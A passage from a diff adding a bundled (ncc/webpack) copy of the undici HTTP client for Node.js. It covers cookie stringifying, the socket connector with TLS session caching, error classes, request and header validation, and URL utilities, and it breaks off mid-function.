out.push(`Max-Age=${cookie.maxAge}`) + } + + if (cookie.domain) { + validateCookieDomain(cookie.domain) + out.push(`Domain=${cookie.domain}`) + } + + if (cookie.path) { + validateCookiePath(cookie.path) + out.push(`Path=${cookie.path}`) + } + + if (cookie.expires && cookie.expires.toString() !== 'Invalid Date') { + out.push(`Expires=${toIMFDate(cookie.expires)}`) + } + + if (cookie.sameSite) { + out.push(`SameSite=${cookie.sameSite}`) + } + + for (const part of cookie.unparsed) { + if (!part.includes('=')) { + throw new 
Error('Invalid unparsed') + } + + const [key, ...value] = part.split('=') + + out.push(`${key.trim()}=${value.join('=')}`) + } + + return out.join('; ') +} + +let kHeadersListNode + +function getHeadersList (headers) { + if (headers[kHeadersList]) { + return headers[kHeadersList] + } + + if (!kHeadersListNode) { + kHeadersListNode = Object.getOwnPropertySymbols(headers).find( + (symbol) => symbol.description === 'headers list' + ) + + assert(kHeadersListNode, 'Headers cannot be parsed') + } + + const headersList = headers[kHeadersListNode] + assert(headersList) + + return headersList +} + +module.exports = { + isCTLExcludingHtab, + stringify, + getHeadersList +} + + +/***/ }), + +/***/ 2067: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const net = __nccwpck_require__(1808) +const assert = __nccwpck_require__(9491) +const util = __nccwpck_require__(3983) +const { InvalidArgumentError, ConnectTimeoutError } = __nccwpck_require__(8045) + +let tls // include tls conditionally since it is not always available + +// TODO: session re-use does not wait for the first +// connection to resolve the session and might therefore +// resolve the same servername multiple times even when +// re-use is enabled. 
+ +let SessionCache +// FIXME: remove workaround when the Node bug is fixed +// https://github.com/nodejs/node/issues/49344#issuecomment-1741776308 +if (global.FinalizationRegistry && !process.env.NODE_V8_COVERAGE) { + SessionCache = class WeakSessionCache { + constructor (maxCachedSessions) { + this._maxCachedSessions = maxCachedSessions + this._sessionCache = new Map() + this._sessionRegistry = new global.FinalizationRegistry((key) => { + if (this._sessionCache.size < this._maxCachedSessions) { + return + } + + const ref = this._sessionCache.get(key) + if (ref !== undefined && ref.deref() === undefined) { + this._sessionCache.delete(key) + } + }) + } + + get (sessionKey) { + const ref = this._sessionCache.get(sessionKey) + return ref ? ref.deref() : null + } + + set (sessionKey, session) { + if (this._maxCachedSessions === 0) { + return + } + + this._sessionCache.set(sessionKey, new WeakRef(session)) + this._sessionRegistry.register(session, sessionKey) + } + } +} else { + SessionCache = class SimpleSessionCache { + constructor (maxCachedSessions) { + this._maxCachedSessions = maxCachedSessions + this._sessionCache = new Map() + } + + get (sessionKey) { + return this._sessionCache.get(sessionKey) + } + + set (sessionKey, session) { + if (this._maxCachedSessions === 0) { + return + } + + if (this._sessionCache.size >= this._maxCachedSessions) { + // remove the oldest session + const { value: oldestKey } = this._sessionCache.keys().next() + this._sessionCache.delete(oldestKey) + } + + this._sessionCache.set(sessionKey, session) + } + } +} + +function buildConnector ({ allowH2, maxCachedSessions, socketPath, timeout, ...opts }) { + if (maxCachedSessions != null && (!Number.isInteger(maxCachedSessions) || maxCachedSessions < 0)) { + throw new InvalidArgumentError('maxCachedSessions must be a positive integer or zero') + } + + const options = { path: socketPath, ...opts } + const sessionCache = new SessionCache(maxCachedSessions == null ? 
100 : maxCachedSessions) + timeout = timeout == null ? 10e3 : timeout + allowH2 = allowH2 != null ? allowH2 : false + return function connect ({ hostname, host, protocol, port, servername, localAddress, httpSocket }, callback) { + let socket + if (protocol === 'https:') { + if (!tls) { + tls = __nccwpck_require__(4404) + } + servername = servername || options.servername || util.getServerName(host) || null + + const sessionKey = servername || hostname + const session = sessionCache.get(sessionKey) || null + + assert(sessionKey) + + socket = tls.connect({ + highWaterMark: 16384, // TLS in node can't have bigger HWM anyway... + ...options, + servername, + session, + localAddress, + // TODO(HTTP/2): Add support for h2c + ALPNProtocols: allowH2 ? ['http/1.1', 'h2'] : ['http/1.1'], + socket: httpSocket, // upgrade socket connection + port: port || 443, + host: hostname + }) + + socket + .on('session', function (session) { + // TODO (fix): Can a session become invalid once established? Don't think so? + sessionCache.set(sessionKey, session) + }) + } else { + assert(!httpSocket, 'httpSocket can only be sent on TLS update') + socket = net.connect({ + highWaterMark: 64 * 1024, // Same as nodejs fs streams. + ...options, + localAddress, + port: port || 80, + host: hostname + }) + } + + // Set TCP keep alive options on the socket here instead of in connect() for the case of assigning the socket + if (options.keepAlive == null || options.keepAlive) { + const keepAliveInitialDelay = options.keepAliveInitialDelay === undefined ? 60e3 : options.keepAliveInitialDelay + socket.setKeepAlive(true, keepAliveInitialDelay) + } + + const cancelTimeout = setupTimeout(() => onConnectTimeout(socket), timeout) + + socket + .setNoDelay(true) + .once(protocol === 'https:' ? 
'secureConnect' : 'connect', function () { + cancelTimeout() + + if (callback) { + const cb = callback + callback = null + cb(null, this) + } + }) + .on('error', function (err) { + cancelTimeout() + + if (callback) { + const cb = callback + callback = null + cb(err) + } + }) + + return socket + } +} + +function setupTimeout (onConnectTimeout, timeout) { + if (!timeout) { + return () => {} + } + + let s1 = null + let s2 = null + const timeoutId = setTimeout(() => { + // setImmediate is added to make sure that we priotorise socket error events over timeouts + s1 = setImmediate(() => { + if (process.platform === 'win32') { + // Windows needs an extra setImmediate probably due to implementation differences in the socket logic + s2 = setImmediate(() => onConnectTimeout()) + } else { + onConnectTimeout() + } + }) + }, timeout) + return () => { + clearTimeout(timeoutId) + clearImmediate(s1) + clearImmediate(s2) + } +} + +function onConnectTimeout (socket) { + util.destroy(socket, new ConnectTimeoutError()) +} + +module.exports = buildConnector + + +/***/ }), + +/***/ 8045: +/***/ ((module) => { + +"use strict"; + + +class UndiciError extends Error { + constructor (message) { + super(message) + this.name = 'UndiciError' + this.code = 'UND_ERR' + } +} + +class ConnectTimeoutError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, ConnectTimeoutError) + this.name = 'ConnectTimeoutError' + this.message = message || 'Connect Timeout Error' + this.code = 'UND_ERR_CONNECT_TIMEOUT' + } +} + +class HeadersTimeoutError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, HeadersTimeoutError) + this.name = 'HeadersTimeoutError' + this.message = message || 'Headers Timeout Error' + this.code = 'UND_ERR_HEADERS_TIMEOUT' + } +} + +class HeadersOverflowError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, HeadersOverflowError) + this.name = 
'HeadersOverflowError' + this.message = message || 'Headers Overflow Error' + this.code = 'UND_ERR_HEADERS_OVERFLOW' + } +} + +class BodyTimeoutError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, BodyTimeoutError) + this.name = 'BodyTimeoutError' + this.message = message || 'Body Timeout Error' + this.code = 'UND_ERR_BODY_TIMEOUT' + } +} + +class ResponseStatusCodeError extends UndiciError { + constructor (message, statusCode, headers, body) { + super(message) + Error.captureStackTrace(this, ResponseStatusCodeError) + this.name = 'ResponseStatusCodeError' + this.message = message || 'Response Status Code Error' + this.code = 'UND_ERR_RESPONSE_STATUS_CODE' + this.body = body + this.status = statusCode + this.statusCode = statusCode + this.headers = headers + } +} + +class InvalidArgumentError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, InvalidArgumentError) + this.name = 'InvalidArgumentError' + this.message = message || 'Invalid Argument Error' + this.code = 'UND_ERR_INVALID_ARG' + } +} + +class InvalidReturnValueError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, InvalidReturnValueError) + this.name = 'InvalidReturnValueError' + this.message = message || 'Invalid Return Value Error' + this.code = 'UND_ERR_INVALID_RETURN_VALUE' + } +} + +class RequestAbortedError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, RequestAbortedError) + this.name = 'AbortError' + this.message = message || 'Request aborted' + this.code = 'UND_ERR_ABORTED' + } +} + +class InformationalError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, InformationalError) + this.name = 'InformationalError' + this.message = message || 'Request information' + this.code = 'UND_ERR_INFO' + } +} + +class RequestContentLengthMismatchError extends UndiciError { 
+ constructor (message) { + super(message) + Error.captureStackTrace(this, RequestContentLengthMismatchError) + this.name = 'RequestContentLengthMismatchError' + this.message = message || 'Request body length does not match content-length header' + this.code = 'UND_ERR_REQ_CONTENT_LENGTH_MISMATCH' + } +} + +class ResponseContentLengthMismatchError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, ResponseContentLengthMismatchError) + this.name = 'ResponseContentLengthMismatchError' + this.message = message || 'Response body length does not match content-length header' + this.code = 'UND_ERR_RES_CONTENT_LENGTH_MISMATCH' + } +} + +class ClientDestroyedError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, ClientDestroyedError) + this.name = 'ClientDestroyedError' + this.message = message || 'The client is destroyed' + this.code = 'UND_ERR_DESTROYED' + } +} + +class ClientClosedError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, ClientClosedError) + this.name = 'ClientClosedError' + this.message = message || 'The client is closed' + this.code = 'UND_ERR_CLOSED' + } +} + +class SocketError extends UndiciError { + constructor (message, socket) { + super(message) + Error.captureStackTrace(this, SocketError) + this.name = 'SocketError' + this.message = message || 'Socket error' + this.code = 'UND_ERR_SOCKET' + this.socket = socket + } +} + +class NotSupportedError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, NotSupportedError) + this.name = 'NotSupportedError' + this.message = message || 'Not supported error' + this.code = 'UND_ERR_NOT_SUPPORTED' + } +} + +class BalancedPoolMissingUpstreamError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, NotSupportedError) + this.name = 'MissingUpstreamError' + this.message = message || 'No 
upstream has been added to the BalancedPool' + this.code = 'UND_ERR_BPL_MISSING_UPSTREAM' + } +} + +class HTTPParserError extends Error { + constructor (message, code, data) { + super(message) + Error.captureStackTrace(this, HTTPParserError) + this.name = 'HTTPParserError' + this.code = code ? `HPE_${code}` : undefined + this.data = data ? data.toString() : undefined + } +} + +class ResponseExceededMaxSizeError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, ResponseExceededMaxSizeError) + this.name = 'ResponseExceededMaxSizeError' + this.message = message || 'Response content exceeded max size' + this.code = 'UND_ERR_RES_EXCEEDED_MAX_SIZE' + } +} + +class RequestRetryError extends UndiciError { + constructor (message, code, { headers, data }) { + super(message) + Error.captureStackTrace(this, RequestRetryError) + this.name = 'RequestRetryError' + this.message = message || 'Request retry error' + this.code = 'UND_ERR_REQ_RETRY' + this.statusCode = code + this.data = data + this.headers = headers + } +} + +module.exports = { + HTTPParserError, + UndiciError, + HeadersTimeoutError, + HeadersOverflowError, + BodyTimeoutError, + RequestContentLengthMismatchError, + ConnectTimeoutError, + ResponseStatusCodeError, + InvalidArgumentError, + InvalidReturnValueError, + RequestAbortedError, + ClientDestroyedError, + ClientClosedError, + InformationalError, + SocketError, + NotSupportedError, + ResponseContentLengthMismatchError, + BalancedPoolMissingUpstreamError, + ResponseExceededMaxSizeError, + RequestRetryError +} + + +/***/ }), + +/***/ 2905: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { + InvalidArgumentError, + NotSupportedError +} = __nccwpck_require__(8045) +const assert = __nccwpck_require__(9491) +const { kHTTP2BuildRequest, kHTTP2CopyHeaders, kHTTP1BuildRequest } = __nccwpck_require__(2785) +const util = __nccwpck_require__(3983) + +// tokenRegExp and 
headerCharRegex have been lifted from +// https://github.com/nodejs/node/blob/main/lib/_http_common.js + +/** + * Verifies that the given val is a valid HTTP token + * per the rules defined in RFC 7230 + * See https://tools.ietf.org/html/rfc7230#section-3.2.6 + */ +const tokenRegExp = /^[\^_`a-zA-Z\-0-9!#$%&'*+.|~]+$/ + +/** + * Matches if val contains an invalid field-vchar + * field-value = *( field-content / obs-fold ) + * field-content = field-vchar [ 1*( SP / HTAB ) field-vchar ] + * field-vchar = VCHAR / obs-text + */ +const headerCharRegex = /[^\t\x20-\x7e\x80-\xff]/ + +// Verifies that a given path is valid does not contain control chars \x00 to \x20 +const invalidPathRegex = /[^\u0021-\u00ff]/ + +const kHandler = Symbol('handler') + +const channels = {} + +let extractBody + +try { + const diagnosticsChannel = __nccwpck_require__(7643) + channels.create = diagnosticsChannel.channel('undici:request:create') + channels.bodySent = diagnosticsChannel.channel('undici:request:bodySent') + channels.headers = diagnosticsChannel.channel('undici:request:headers') + channels.trailers = diagnosticsChannel.channel('undici:request:trailers') + channels.error = diagnosticsChannel.channel('undici:request:error') +} catch { + channels.create = { hasSubscribers: false } + channels.bodySent = { hasSubscribers: false } + channels.headers = { hasSubscribers: false } + channels.trailers = { hasSubscribers: false } + channels.error = { hasSubscribers: false } +} + +class Request { + constructor (origin, { + path, + method, + body, + headers, + query, + idempotent, + blocking, + upgrade, + headersTimeout, + bodyTimeout, + reset, + throwOnError, + expectContinue + }, handler) { + if (typeof path !== 'string') { + throw new InvalidArgumentError('path must be a string') + } else if ( + path[0] !== '/' && + !(path.startsWith('http://') || path.startsWith('https://')) && + method !== 'CONNECT' + ) { + throw new InvalidArgumentError('path must be an absolute URL or start with a slash') 
+ } else if (invalidPathRegex.exec(path) !== null) { + throw new InvalidArgumentError('invalid request path') + } + + if (typeof method !== 'string') { + throw new InvalidArgumentError('method must be a string') + } else if (tokenRegExp.exec(method) === null) { + throw new InvalidArgumentError('invalid request method') + } + + if (upgrade && typeof upgrade !== 'string') { + throw new InvalidArgumentError('upgrade must be a string') + } + + if (headersTimeout != null && (!Number.isFinite(headersTimeout) || headersTimeout < 0)) { + throw new InvalidArgumentError('invalid headersTimeout') + } + + if (bodyTimeout != null && (!Number.isFinite(bodyTimeout) || bodyTimeout < 0)) { + throw new InvalidArgumentError('invalid bodyTimeout') + } + + if (reset != null && typeof reset !== 'boolean') { + throw new InvalidArgumentError('invalid reset') + } + + if (expectContinue != null && typeof expectContinue !== 'boolean') { + throw new InvalidArgumentError('invalid expectContinue') + } + + this.headersTimeout = headersTimeout + + this.bodyTimeout = bodyTimeout + + this.throwOnError = throwOnError === true + + this.method = method + + this.abort = null + + if (body == null) { + this.body = null + } else if (util.isStream(body)) { + this.body = body + + const rState = this.body._readableState + if (!rState || !rState.autoDestroy) { + this.endHandler = function autoDestroy () { + util.destroy(this) + } + this.body.on('end', this.endHandler) + } + + this.errorHandler = err => { + if (this.abort) { + this.abort(err) + } else { + this.error = err + } + } + this.body.on('error', this.errorHandler) + } else if (util.isBuffer(body)) { + this.body = body.byteLength ? body : null + } else if (ArrayBuffer.isView(body)) { + this.body = body.buffer.byteLength ? Buffer.from(body.buffer, body.byteOffset, body.byteLength) : null + } else if (body instanceof ArrayBuffer) { + this.body = body.byteLength ? Buffer.from(body) : null + } else if (typeof body === 'string') { + this.body = body.length ? 
Buffer.from(body) : null + } else if (util.isFormDataLike(body) || util.isIterable(body) || util.isBlobLike(body)) { + this.body = body + } else { + throw new InvalidArgumentError('body must be a string, a Buffer, a Readable stream, an iterable, or an async iterable') + } + + this.completed = false + + this.aborted = false + + this.upgrade = upgrade || null + + this.path = query ? util.buildURL(path, query) : path + + this.origin = origin + + this.idempotent = idempotent == null + ? method === 'HEAD' || method === 'GET' + : idempotent + + this.blocking = blocking == null ? false : blocking + + this.reset = reset == null ? null : reset + + this.host = null + + this.contentLength = null + + this.contentType = null + + this.headers = '' + + // Only for H2 + this.expectContinue = expectContinue != null ? expectContinue : false + + if (Array.isArray(headers)) { + if (headers.length % 2 !== 0) { + throw new InvalidArgumentError('headers array must be even') + } + for (let i = 0; i < headers.length; i += 2) { + processHeader(this, headers[i], headers[i + 1]) + } + } else if (headers && typeof headers === 'object') { + const keys = Object.keys(headers) + for (let i = 0; i < keys.length; i++) { + const key = keys[i] + processHeader(this, key, headers[key]) + } + } else if (headers != null) { + throw new InvalidArgumentError('headers must be an object or an array') + } + + if (util.isFormDataLike(this.body)) { + if (util.nodeMajor < 16 || (util.nodeMajor === 16 && util.nodeMinor < 8)) { + throw new InvalidArgumentError('Form-Data bodies are only supported in node v16.8 and newer.') + } + + if (!extractBody) { + extractBody = (__nccwpck_require__(1472).extractBody) + } + + const [bodyStream, contentType] = extractBody(body) + if (this.contentType == null) { + this.contentType = contentType + this.headers += `content-type: ${contentType}\r\n` + } + this.body = bodyStream.stream + this.contentLength = bodyStream.length + } else if (util.isBlobLike(body) && this.contentType == 
null && body.type) { + this.contentType = body.type + this.headers += `content-type: ${body.type}\r\n` + } + + util.validateHandler(handler, method, upgrade) + + this.servername = util.getServerName(this.host) + + this[kHandler] = handler + + if (channels.create.hasSubscribers) { + channels.create.publish({ request: this }) + } + } + + onBodySent (chunk) { + if (this[kHandler].onBodySent) { + try { + return this[kHandler].onBodySent(chunk) + } catch (err) { + this.abort(err) + } + } + } + + onRequestSent () { + if (channels.bodySent.hasSubscribers) { + channels.bodySent.publish({ request: this }) + } + + if (this[kHandler].onRequestSent) { + try { + return this[kHandler].onRequestSent() + } catch (err) { + this.abort(err) + } + } + } + + onConnect (abort) { + assert(!this.aborted) + assert(!this.completed) + + if (this.error) { + abort(this.error) + } else { + this.abort = abort + return this[kHandler].onConnect(abort) + } + } + + onHeaders (statusCode, headers, resume, statusText) { + assert(!this.aborted) + assert(!this.completed) + + if (channels.headers.hasSubscribers) { + channels.headers.publish({ request: this, response: { statusCode, headers, statusText } }) + } + + try { + return this[kHandler].onHeaders(statusCode, headers, resume, statusText) + } catch (err) { + this.abort(err) + } + } + + onData (chunk) { + assert(!this.aborted) + assert(!this.completed) + + try { + return this[kHandler].onData(chunk) + } catch (err) { + this.abort(err) + return false + } + } + + onUpgrade (statusCode, headers, socket) { + assert(!this.aborted) + assert(!this.completed) + + return this[kHandler].onUpgrade(statusCode, headers, socket) + } + + onComplete (trailers) { + this.onFinally() + + assert(!this.aborted) + + this.completed = true + if (channels.trailers.hasSubscribers) { + channels.trailers.publish({ request: this, trailers }) + } + + try { + return this[kHandler].onComplete(trailers) + } catch (err) { + // TODO (fix): This might be a bad idea? 
+ this.onError(err) + } + } + + onError (error) { + this.onFinally() + + if (channels.error.hasSubscribers) { + channels.error.publish({ request: this, error }) + } + + if (this.aborted) { + return + } + this.aborted = true + + return this[kHandler].onError(error) + } + + onFinally () { + if (this.errorHandler) { + this.body.off('error', this.errorHandler) + this.errorHandler = null + } + + if (this.endHandler) { + this.body.off('end', this.endHandler) + this.endHandler = null + } + } + + // TODO: adjust to support H2 + addHeader (key, value) { + processHeader(this, key, value) + return this + } + + static [kHTTP1BuildRequest] (origin, opts, handler) { + // TODO: Migrate header parsing here, to make Requests + // HTTP agnostic + return new Request(origin, opts, handler) + } + + static [kHTTP2BuildRequest] (origin, opts, handler) { + const headers = opts.headers + opts = { ...opts, headers: null } + + const request = new Request(origin, opts, handler) + + request.headers = {} + + if (Array.isArray(headers)) { + if (headers.length % 2 !== 0) { + throw new InvalidArgumentError('headers array must be even') + } + for (let i = 0; i < headers.length; i += 2) { + processHeader(request, headers[i], headers[i + 1], true) + } + } else if (headers && typeof headers === 'object') { + const keys = Object.keys(headers) + for (let i = 0; i < keys.length; i++) { + const key = keys[i] + processHeader(request, key, headers[key], true) + } + } else if (headers != null) { + throw new InvalidArgumentError('headers must be an object or an array') + } + + return request + } + + static [kHTTP2CopyHeaders] (raw) { + const rawHeaders = raw.split('\r\n') + const headers = {} + + for (const header of rawHeaders) { + const [key, value] = header.split(': ') + + if (value == null || value.length === 0) continue + + if (headers[key]) headers[key] += `,${value}` + else headers[key] = value + } + + return headers + } +} + +function processHeaderValue (key, val, skipAppend) { + if (val && typeof val 
=== 'object') { + throw new InvalidArgumentError(`invalid ${key} header`) + } + + val = val != null ? `${val}` : '' + + if (headerCharRegex.exec(val) !== null) { + throw new InvalidArgumentError(`invalid ${key} header`) + } + + return skipAppend ? val : `${key}: ${val}\r\n` +} + +function processHeader (request, key, val, skipAppend = false) { + if (val && (typeof val === 'object' && !Array.isArray(val))) { + throw new InvalidArgumentError(`invalid ${key} header`) + } else if (val === undefined) { + return + } + + if ( + request.host === null && + key.length === 4 && + key.toLowerCase() === 'host' + ) { + if (headerCharRegex.exec(val) !== null) { + throw new InvalidArgumentError(`invalid ${key} header`) + } + // Consumed by Client + request.host = val + } else if ( + request.contentLength === null && + key.length === 14 && + key.toLowerCase() === 'content-length' + ) { + request.contentLength = parseInt(val, 10) + if (!Number.isFinite(request.contentLength)) { + throw new InvalidArgumentError('invalid content-length header') + } + } else if ( + request.contentType === null && + key.length === 12 && + key.toLowerCase() === 'content-type' + ) { + request.contentType = val + if (skipAppend) request.headers[key] = processHeaderValue(key, val, skipAppend) + else request.headers += processHeaderValue(key, val) + } else if ( + key.length === 17 && + key.toLowerCase() === 'transfer-encoding' + ) { + throw new InvalidArgumentError('invalid transfer-encoding header') + } else if ( + key.length === 10 && + key.toLowerCase() === 'connection' + ) { + const value = typeof val === 'string' ? 
val.toLowerCase() : null + if (value !== 'close' && value !== 'keep-alive') { + throw new InvalidArgumentError('invalid connection header') + } else if (value === 'close') { + request.reset = true + } + } else if ( + key.length === 10 && + key.toLowerCase() === 'keep-alive' + ) { + throw new InvalidArgumentError('invalid keep-alive header') + } else if ( + key.length === 7 && + key.toLowerCase() === 'upgrade' + ) { + throw new InvalidArgumentError('invalid upgrade header') + } else if ( + key.length === 6 && + key.toLowerCase() === 'expect' + ) { + throw new NotSupportedError('expect header not supported') + } else if (tokenRegExp.exec(key) === null) { + throw new InvalidArgumentError('invalid header key') + } else { + if (Array.isArray(val)) { + for (let i = 0; i < val.length; i++) { + if (skipAppend) { + if (request.headers[key]) request.headers[key] += `,${processHeaderValue(key, val[i], skipAppend)}` + else request.headers[key] = processHeaderValue(key, val[i], skipAppend) + } else { + request.headers += processHeaderValue(key, val[i]) + } + } + } else { + if (skipAppend) request.headers[key] = processHeaderValue(key, val, skipAppend) + else request.headers += processHeaderValue(key, val) + } + } +} + +module.exports = Request + + +/***/ }), + +/***/ 2785: +/***/ ((module) => { + +module.exports = { + kClose: Symbol('close'), + kDestroy: Symbol('destroy'), + kDispatch: Symbol('dispatch'), + kUrl: Symbol('url'), + kWriting: Symbol('writing'), + kResuming: Symbol('resuming'), + kQueue: Symbol('queue'), + kConnect: Symbol('connect'), + kConnecting: Symbol('connecting'), + kHeadersList: Symbol('headers list'), + kKeepAliveDefaultTimeout: Symbol('default keep alive timeout'), + kKeepAliveMaxTimeout: Symbol('max keep alive timeout'), + kKeepAliveTimeoutThreshold: Symbol('keep alive timeout threshold'), + kKeepAliveTimeoutValue: Symbol('keep alive timeout'), + kKeepAlive: Symbol('keep alive'), + kHeadersTimeout: Symbol('headers timeout'), + kBodyTimeout: Symbol('body 
timeout'), + kServerName: Symbol('server name'), + kLocalAddress: Symbol('local address'), + kHost: Symbol('host'), + kNoRef: Symbol('no ref'), + kBodyUsed: Symbol('used'), + kRunning: Symbol('running'), + kBlocking: Symbol('blocking'), + kPending: Symbol('pending'), + kSize: Symbol('size'), + kBusy: Symbol('busy'), + kQueued: Symbol('queued'), + kFree: Symbol('free'), + kConnected: Symbol('connected'), + kClosed: Symbol('closed'), + kNeedDrain: Symbol('need drain'), + kReset: Symbol('reset'), + kDestroyed: Symbol.for('nodejs.stream.destroyed'), + kMaxHeadersSize: Symbol('max headers size'), + kRunningIdx: Symbol('running index'), + kPendingIdx: Symbol('pending index'), + kError: Symbol('error'), + kClients: Symbol('clients'), + kClient: Symbol('client'), + kParser: Symbol('parser'), + kOnDestroyed: Symbol('destroy callbacks'), + kPipelining: Symbol('pipelining'), + kSocket: Symbol('socket'), + kHostHeader: Symbol('host header'), + kConnector: Symbol('connector'), + kStrictContentLength: Symbol('strict content length'), + kMaxRedirections: Symbol('maxRedirections'), + kMaxRequests: Symbol('maxRequestsPerClient'), + kProxy: Symbol('proxy agent options'), + kCounter: Symbol('socket request counter'), + kInterceptors: Symbol('dispatch interceptors'), + kMaxResponseSize: Symbol('max response size'), + kHTTP2Session: Symbol('http2Session'), + kHTTP2SessionState: Symbol('http2Session state'), + kHTTP2BuildRequest: Symbol('http2 build request'), + kHTTP1BuildRequest: Symbol('http1 build request'), + kHTTP2CopyHeaders: Symbol('http2 copy headers'), + kHTTPConnVersion: Symbol('http connection version'), + kRetryHandlerDefaultRetry: Symbol('retry agent default retry'), + kConstruct: Symbol('constructable') +} + + +/***/ }), + +/***/ 3983: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const assert = __nccwpck_require__(9491) +const { kDestroyed, kBodyUsed } = __nccwpck_require__(2785) +const { IncomingMessage } = 
__nccwpck_require__(3685) +const stream = __nccwpck_require__(2781) +const net = __nccwpck_require__(1808) +const { InvalidArgumentError } = __nccwpck_require__(8045) +const { Blob } = __nccwpck_require__(4300) +const nodeUtil = __nccwpck_require__(3837) +const { stringify } = __nccwpck_require__(3477) + +const [nodeMajor, nodeMinor] = process.versions.node.split('.').map(v => Number(v)) + +function nop () {} + +function isStream (obj) { + return obj && typeof obj === 'object' && typeof obj.pipe === 'function' && typeof obj.on === 'function' +} + +// based on https://github.com/node-fetch/fetch-blob/blob/8ab587d34080de94140b54f07168451e7d0b655e/index.js#L229-L241 (MIT License) +function isBlobLike (object) { + return (Blob && object instanceof Blob) || ( + object && + typeof object === 'object' && + (typeof object.stream === 'function' || + typeof object.arrayBuffer === 'function') && + /^(Blob|File)$/.test(object[Symbol.toStringTag]) + ) +} + +function buildURL (url, queryParams) { + if (url.includes('?') || url.includes('#')) { + throw new Error('Query params cannot be passed when url already contains "?" or "#".') + } + + const stringified = stringify(queryParams) + + if (stringified) { + url += '?' 
+ stringified + } + + return url +} + +function parseURL (url) { + if (typeof url === 'string') { + url = new URL(url) + + if (!/^https?:/.test(url.origin || url.protocol)) { + throw new InvalidArgumentError('Invalid URL protocol: the URL must start with `http:` or `https:`.') + } + + return url + } + + if (!url || typeof url !== 'object') { + throw new InvalidArgumentError('Invalid URL: The URL argument must be a non-null object.') + } + + if (!/^https?:/.test(url.origin || url.protocol)) { + throw new InvalidArgumentError('Invalid URL protocol: the URL must start with `http:` or `https:`.') + } + + if (!(url instanceof URL)) { + if (url.port != null && url.port !== '' && !Number.isFinite(parseInt(url.port))) { + throw new InvalidArgumentError('Invalid URL: port must be a valid integer or a string representation of an integer.') + } + + if (url.path != null && typeof url.path !== 'string') { + throw new InvalidArgumentError('Invalid URL path: the path must be a string or null/undefined.') + } + + if (url.pathname != null && typeof url.pathname !== 'string') { + throw new InvalidArgumentError('Invalid URL pathname: the pathname must be a string or null/undefined.') + } + + if (url.hostname != null && typeof url.hostname !== 'string') { + throw new InvalidArgumentError('Invalid URL hostname: the hostname must be a string or null/undefined.') + } + + if (url.origin != null && typeof url.origin !== 'string') { + throw new InvalidArgumentError('Invalid URL origin: the origin must be a string or null/undefined.') + } + + const port = url.port != null + ? url.port + : (url.protocol === 'https:' ? 443 : 80) + let origin = url.origin != null + ? url.origin + : `${url.protocol}//${url.hostname}:${port}` + let path = url.path != null + ? 
url.path + : `${url.pathname || ''}${url.search || ''}` + + if (origin.endsWith('/')) { + origin = origin.substring(0, origin.length - 1) + } + + if (path && !path.startsWith('/')) { + path = `/${path}` + } + // new URL(path, origin) is unsafe when `path` contains an absolute URL + // From https://developer.mozilla.org/en-US/docs/Web/API/URL/URL: + // If first parameter is a relative URL, second param is required, and will be used as the base URL. + // If first parameter is an absolute URL, a given second param will be ignored. + url = new URL(origin + path) + } + + return url +} + +function parseOrigin (url) { + url = parseURL(url) + + if (url.pathname !== '/' || url.search || url.hash) { + throw new InvalidArgumentError('invalid url') + } + + return url +} + +function getHostname (host) { + if (host[0] === '[') { + const idx = host.indexOf(']') + + assert(idx !== -1) + return host.substring(1, idx) + } + + const idx = host.indexOf(':') + if (idx === -1) return host + + return host.substring(0, idx) +} + +// IP addresses are not valid server names per RFC6066 +// > Currently, the only server names supported are DNS hostnames +function getServerName (host) { + if (!host) { + return null + } + + assert.strictEqual(typeof host, 'string') + + const servername = getHostname(host) + if (net.isIP(servername)) { + return '' + } + + return servername +} + +function deepClone (obj) { + return JSON.parse(JSON.stringify(obj)) +} + +function isAsyncIterable (obj) { + return !!(obj != null && typeof obj[Symbol.asyncIterator] === 'function') +} + +function isIterable (obj) { + return !!(obj != null && (typeof obj[Symbol.iterator] === 'function' || typeof obj[Symbol.asyncIterator] === 'function')) +} + +function bodyLength (body) { + if (body == null) { + return 0 + } else if (isStream(body)) { + const state = body._readableState + return state && state.objectMode === false && state.ended === true && Number.isFinite(state.length) + ? 
state.length + : null + } else if (isBlobLike(body)) { + return body.size != null ? body.size : null + } else if (isBuffer(body)) { + return body.byteLength + } + + return null +} + +function isDestroyed (stream) { + return !stream || !!(stream.destroyed || stream[kDestroyed]) +} + +function isReadableAborted (stream) { + const state = stream && stream._readableState + return isDestroyed(stream) && state && !state.endEmitted +} + +function destroy (stream, err) { + if (stream == null || !isStream(stream) || isDestroyed(stream)) { + return + } + + if (typeof stream.destroy === 'function') { + if (Object.getPrototypeOf(stream).constructor === IncomingMessage) { + // See: https://github.com/nodejs/node/pull/38505/files + stream.socket = null + } + + stream.destroy(err) + } else if (err) { + process.nextTick((stream, err) => { + stream.emit('error', err) + }, stream, err) + } + + if (stream.destroyed !== true) { + stream[kDestroyed] = true + } +} + +const KEEPALIVE_TIMEOUT_EXPR = /timeout=(\d+)/ +function parseKeepAliveTimeout (val) { + const m = val.toString().match(KEEPALIVE_TIMEOUT_EXPR) + return m ? 
